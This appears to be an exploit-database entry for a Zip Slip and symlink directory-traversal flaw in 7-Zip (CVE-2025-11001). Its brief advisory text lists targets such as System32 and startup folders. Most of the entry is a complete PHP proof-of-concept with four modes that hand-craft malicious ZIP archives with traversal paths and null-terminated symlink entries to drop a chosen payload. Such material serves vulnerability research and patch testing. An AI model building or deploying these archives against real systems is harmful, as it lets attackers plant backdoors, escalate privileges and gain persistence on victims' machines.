PACKETSTORM 7.8 HIGH

πŸ“„ 7-Zip 25.00 Zip Slip Directory Traversal_PACKETSTORM:212101

November 26, 2025 invoker category_exploit
7.8 / 10
HIGH
CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Description

7-Zip version 25.00 suffers from a symlink directory traversal vulnerability. This write up provides analysis with a proof of concept...
Visit Original Source

Basic Information

ID PACKETSTORM:212101
Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : 7-Zip 25.00 Zip Slip Symlink Directory Traversal Vulnerability |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.7-zip.org/ |
=============================================================================================================================================

[+] References : https://packetstorm.news/files/id/211932/ & CVE-2025-11001

[+] Summary :

Multiple archive extraction implementations, including 7‑Zip versions prior to 25.00 and several ZIP libraries, improperly sanitize file paths during extraction.
An attacker can craft a malicious ZIP archive containing:

Directory traversal sequences (../../../)

Symlink entries

Manipulated extra fields

Null‑byte terminated link targets

This allows files to be extracted outside the intended extraction folder and written to arbitrary locations on the victim system.

[+] Vulnerability Class :

Directory Traversal

Arbitrary File Write

Symlink Path Injection

Null-byte truncation bug

[+] Affected Software :

7‑Zip < 25.00 (Administrator-only exploitation on Windows)

Any ZIP extraction tool vulnerable to Zip Slip (Java, PHP, Python, WinRAR variants...)

Applications that use ZipArchive without proper sanitization

[+] Impact

A malicious ZIP archive allows an attacker to place files in arbitrary locations such as

C:\Windows\System32\
C:\ProgramData\Microsoft\Windows\Start Menu\
/etc/
/var/www/html/


[+] Possible consequences:

Backdoor planting

Privilege escalation

Persistence via startup folders

Overwriting sensitive files

Gaining remote execution depending on file location created

[+] Technical Details

[+] Core Exploit Mechanism

The attacker inserts filenames such as : ../../../../Windows/System32/evil.exe

or a symlink entry: evil.lnk β†’ ../../../../Users/Public/Documents\0

These paths bypass validators in 7‑Zip and other ZIP extractors when running with elevated privileges.

poc

<?php
/*
===========================================================
By Indoushka (Nekaa Salah eddine)
===========================================================
*/

/* ===========================================================
MODE 1 β€” Basic Zip Slip Exploit
(Former: build_zip duplicated 4 times)
=========================================================== */
function poc_zip_slip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Payload not found\n"); }

$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);

$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;

$zip = new ZipArchive();
if ($zip->open($output_zip, ZipArchive::CREATE | ZipArchive::OVERWRITE) !== TRUE) {
die("[-] Failed to create ZIP\n");
}

$zip->addFromString($traversal . $payload_name, $payload_data);
$zip->close();

echo "[+] PoC: Zip Slip ZIP created: $output_zip\n";
}


/* ===========================================================
MODE 2 β€” Manual Symlink ZIP Creator
=========================================================== */
function poc_symlink_zip($target_path, $output_zip)
{
$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$traversal = "../../../../" . $target;

$name = "evil.lnk";
$link = $traversal . "\x00";

$extra = pack("v", 0x756e);
$extra .= pack("v", strlen($link));
$extra .= $link;

$local = pack("VvvvvvVVVvv",
0x04034b50, 20, 0x800, 0x800, 0,0,0,0,0,
strlen($name), strlen($extra)
);

file_put_contents($output_zip, $local . $name . $extra);

echo "[+] PoC: Symlink ZIP created: $output_zip\n";
}


/* ===========================================================
MODE 3 β€” Full Manual ZIP Builder (Symlink + Payload)
=========================================================== */
function poc_manual_zip($target_path, $payload_file, $output_zip)
{
if (!file_exists($payload_file)) { die("[-] Missing payload\n"); }

$payload_name = basename($payload_file);
$payload_data = file_get_contents($payload_file);

$target = trim(str_replace("\\", "/", $target_path), "/") . "/";
$trav = "../../../../" . $target;

$ln_name = "evil.lnk";
$ln_target = $trav . "\x00";
$ln_extra = pack("v", 0x756e).pack("v",strlen($ln_target)).$ln_target;

$f = fopen($output_zip, "wb");
$off = 0;

// Local: Symlink
$h1 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0x800,0,0,0,0,0,strlen($ln_name),strlen($ln_extra)
);
fwrite($f, $h1.$ln_name.$ln_extra);
$symlink_offset = $off;
$off += strlen($h1)+strlen($ln_name)+strlen($ln_extra);

// Local: Payload
$h2 = pack("VvvvvvVVVvv",
0x04034b50,20,0x800,0,0,0,0,strlen($payload_data),strlen($payload_data),
strlen($payload_name),0
);
fwrite($f, $h2.$payload_name.$payload_data);
$payload_offset = $off;
$off += strlen($h2)+strlen($payload_name)+strlen($payload_data);

// Central Directory
$cd_start = $off;

// CD: Symlink
$cd1 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,0,0,
strlen($ln_name),strlen($ln_extra),0,0,0,(0777<<16)|0xA1ED,$symlink_offset
);
fwrite($f, $cd1.$ln_name.$ln_extra);

// CD: Payload
$cd2 = pack("VvvvvvVVVvvvvvVV",
0x02014b50,0x0317,20,0x800,0,0,0,0,
strlen($payload_data),strlen($payload_data),
strlen($payload_name),0,0,0,0,(0777<<16),$payload_offset
);
fwrite($f, $cd2.$payload_name);

// EOCD
$eocd = pack("VvvvvVVv",
0x06054b50,0,0,2,2,$off,$cd_start,0
);
fwrite($f, $eocd);
fclose($f);

echo "[+] PoC: Manual ZIP generated: $output_zip\n";
}


/* ===========================================================
MODE 4 β€” CVE‑2025‑11001 (7-Zip Directory Traversal)
=========================================================== */
function poc_cve_2025_11001($target, $payload, $output)
{
poc_manual_zip($target, $payload, $output);

echo "[+] CVE-2025-11001 Archive Ready\n";
}


/* ===========================================================
CLI Controller
=========================================================== */

if (php_sapi_name() == "cli")
{
$args = getopt("", [
"mode:",
"target:",
"payload::",
"output::"
]);

if (!isset($args["mode"])) {
die("Usage:\n
php exploit.php --mode=zip-slip --target=DIR --payload=file --output=out.zip
php exploit.php --mode=symlink --target=DIR --output=out.zip
php exploit.php --mode=manual --target=DIR --payload=file --output=out.zip
php exploit.php --mode=cve-2025-11001 --target=DIR --payload=file --output=exp.zip
");
}

$mode = $args["mode"];
$target = $args["target"] ?? null;
$payload= $args["payload"] ?? null;
$output = $args["output"] ?? "exploit.zip";

switch ($mode) {
case "zip-slip":
poc_zip_slip($target, $payload, $output);
break;

case "symlink":
poc_symlink_zip($target, $output);
break;

case "manual":
poc_manual_zip($target, $payload, $output);
break;

case "cve-2025-11001":
poc_cve_2025_11001($target, $payload, $output);
break;

default:
echo "Unknown mode.\n";
}
}
?>


Save as : poc.php

run : php poc.php


Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

πŸ’­ Join the Security Discussion

πŸ”’ Your email address will not be published. Required fields are marked *

⚠️ Please be respectful and constructive in your comments. Security discussions should remain professional.